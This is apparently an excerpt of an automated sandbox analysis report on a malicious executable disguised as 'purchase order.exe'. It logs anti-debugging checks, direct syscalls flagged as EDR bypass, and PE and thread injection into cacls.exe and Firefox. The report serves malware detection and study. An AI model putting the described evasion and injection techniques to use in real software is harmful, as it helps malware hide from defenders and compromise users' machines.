                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01594AD0 mov eax, dword ptr fs:[00000030h]3_2_01594AD0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01594AD0 mov eax, dword ptr fs:[00000030h]3_2_01594AD0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015B6ACC mov eax, dword ptr fs:[00000030h]3_2_015B6ACC
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015B6ACC mov eax, dword ptr fs:[00000030h]3_2_015B6ACC
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015B6ACC mov eax, dword ptr fs:[00000030h]3_2_015B6ACC
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159AAEE mov eax, dword ptr fs:[00000030h]3_2_0159AAEE
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159AAEE mov eax, dword ptr fs:[00000030h]3_2_0159AAEE
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01598A90 mov edx, dword ptr fs:[00000030h]3_2_01598A90
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0156EA80 mov eax, dword ptr fs:[00000030h]3_2_0156EA80
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0156EA80 mov eax, dword ptr fs:[00000030h]3_2_0156EA80
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0156EA80 mov eax, dword ptr fs:[00000030h]3_2_0156EA80
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0156EA80 mov eax, dword ptr fs:[00000030h]3_2_0156EA80
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0156EA80 mov eax, dword ptr fs:[00000030h]3_2_0156EA80
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0156EA80 mov eax, dword ptr fs:[00000030h]3_2_0156EA80
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0156EA80 mov eax, dword ptr fs:[00000030h]3_2_0156EA80
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0156EA80 mov eax, dword ptr fs:[00000030h]3_2_0156EA80
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0156EA80 mov eax, dword ptr fs:[00000030h]3_2_0156EA80
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01634A80 mov eax, dword ptr fs:[00000030h]3_2_01634A80
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01568AA0 mov eax, dword ptr fs:[00000030h]3_2_01568AA0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01568AA0 mov eax, dword ptr fs:[00000030h]3_2_01568AA0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015B6AA4 mov eax, dword ptr fs:[00000030h]3_2_015B6AA4
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01560D59 mov eax, dword ptr fs:[00000030h]3_2_01560D59
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01560D59 mov eax, dword ptr fs:[00000030h]3_2_01560D59
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01560D59 mov eax, dword ptr fs:[00000030h]3_2_01560D59
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01568D59 mov eax, dword ptr fs:[00000030h]3_2_01568D59
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01568D59 mov eax, dword ptr fs:[00000030h]3_2_01568D59
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01568D59 mov eax, dword ptr fs:[00000030h]3_2_01568D59
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01568D59 mov eax, dword ptr fs:[00000030h]3_2_01568D59
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01568D59 mov eax, dword ptr fs:[00000030h]3_2_01568D59
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015F8D6B mov eax, dword ptr fs:[00000030h]3_2_015F8D6B
                Source: C:\Users\user\Desktop\purchase order.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeNtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\purchase order.exeMemory written: C:\Users\user\Desktop\purchase order.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\purchase order.exeSection loaded: NULL target: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeSection loaded: NULL target: C:\Windows\SysWOW64\cacls.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: NULL target: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: NULL target: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\cacls.exeThread register set: target process: 6012Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\cacls.exeThread APC queued: target process: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeProcess created: C:\Users\user\Desktop\purchase order.exe "C:\Users\user\Desktop\purchase order.exe"Jump to behavior
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeProcess created: C:\Windows\SysWOW64\cacls.exe "C:\Windows\SysWOW64\cacls.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: olMGHvjsNFhNU.exe, 00000006.00000002.3517785921.00000000014B0000.00000002.00000001.00040000.00000000.sdmp, olMGHvjsNFhNU.exe, 00000006.00000000.2274185299.00000000014B1000.00000002.00000001.00040000.00000000.sdmp, olMGHvjsNFhNU.exe, 00000008.00000002.3518075313.00000000015C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: olMGHvjsNFhNU.exe, 00000006.00000002.3517785921.00000000014B0000.00000002.00000001.00040000.00000000.sdmp, olMGHvjsNFhNU.exe, 00000006.00000000.2274185299.00000000014B1000.00000002.00000001.00040000.00000000.sdmp, olMGHvjsNFhNU.exe, 00000008.00000002.3518075313.00000000015C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: olMGHvjsNFhNU.exe, 00000006.00000002.3517785921.00000000014B0000.00000002.00000001.00040000.00000000.sdmp, olMGHvjsNFhNU.exe, 00000006.00000000.2274185299.00000000014B1000.00000002.00000001.00040000.00000000.sdmp, olMGHvjsNFhNU.exe, 00000008.00000002.3518075313.00000000015C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: olMGHvjsNFhNU.exe, 00000006.00000002.3517785921.00000000014B0000.00000002.00000001.00040000.00000000.sdmp, olMGHvjsNFhNU.exe, 00000006.00000000.2274185299.00000000014B1000.00000002.00000001.00040000.00000000.sdmp, olMGHvjsNFhNU.exe, 00000008.00000002.3518075313.00000000015C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Users\user\Desktop\purchase order.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
